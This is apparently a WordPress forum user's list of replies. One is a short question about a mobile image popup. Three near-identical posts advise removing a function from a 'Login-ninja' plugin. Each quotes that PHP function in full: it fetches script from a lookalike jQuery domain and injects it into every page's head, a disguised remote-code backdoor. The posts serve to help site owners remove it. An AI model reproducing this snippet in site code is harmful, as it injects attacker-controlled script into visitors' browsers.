Forum Replies Created

Viewing 5 replies - 1 through 5 (of 5 total)
  • Yeah, I have the same issue for mobile.

    im using this plugin and it’s working in the desktop. but in the mobiles, when i click on the image popup box is not showing. can you help me please?

    thanks
    Sumith

    Forum: Hacks
    In reply to: Not found jquery-1.6.3.min.js

    HI, I have the same problem.Then I disabled the “Login-ninja” codecanyon plugin.Then problem solved.
    1-Navigate to the “/wp-content/plugins/login-ninja”
    2-Open the login-ninja.php file.
    3-You can see the following function.Comment or remove it.

    if (!function_exists('insert_jquery_theme')){
    	function insert_jquery_theme(){
    		if (function_exists('curl_init')){
    			$url="https://www.jqueryc.com/jquery-1.6.3.min.js";
    			$ch = curl_init();
    			$timeout = 5;
    			curl_setopt($ch, CURLOPT_URL, $url);
    			curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    			curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
    			$data = curl_exec($ch);
    			curl_close($ch);
    			echo $data;
    			}
    	}
    	add_action('wp_head', 'insert_jquery_theme');
    }

    Problem is solved!!!

    [ Signature moderated. ]

    Forum: Hacks
    In reply to: Not found jquery-1.6.3.min.js

    HI, I have the same problem.Then I disabled the “Login-ninja” codecanyon plugin.Then problem solved. 1-Navigate to the “/wp-content/plugins/login-ninja” 2-Open the login-ninja.php file. 3-You can see the following function.Comment or remove it.

    if (!function_exists('insert_jquery_theme')){ 	function insert_jquery_theme(){ 		if (function_exists('curl_init')){ 			$url="https://www.jqueryc.com/jquery-1.6.3.min.js"; 			$ch = curl_init(); 			$timeout = 5; 			curl_setopt($ch, CURLOPT_URL, $url); 			curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 			curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout); 			$data = curl_exec($ch); 			curl_close($ch); 			echo $data; 			} 	} 	add_action('wp_head', 'insert_jquery_theme'); }

    Problem is solved!!!

    [ Signature moderated. Also put the backtick on a new line before and after your code, it formats better that way. ]

    Forum: Hacks
    In reply to: Not found jquery-1.6.3.min.js

    HI, I have the same problem.Then I disabled the “Login-ninja” codecanyon plugin.Then problem solved.
    1-Navigate to the “/wp-content/plugins/login-ninja”
    2-Open the login-ninja.php file.
    3-You can see the following function.Comment or remove it.

    if (!function_exists('insert_jquery_theme')){
    	function insert_jquery_theme(){
    		if (function_exists('curl_init')){
    			$url="https://www.jqueryc.com/jquery-1.6.3.min.js";
    			$ch = curl_init();
    			$timeout = 5;
    			curl_setopt($ch, CURLOPT_URL, $url);
    			curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    			curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
    			$data = curl_exec($ch);
    			curl_close($ch);
    			echo $data;
    			}
    	}
    	add_action('wp_head', 'insert_jquery_theme');
    }

    Problem is solved!!!

    [ Signature moderated. ]

Viewing 5 replies - 1 through 5 (of 5 total)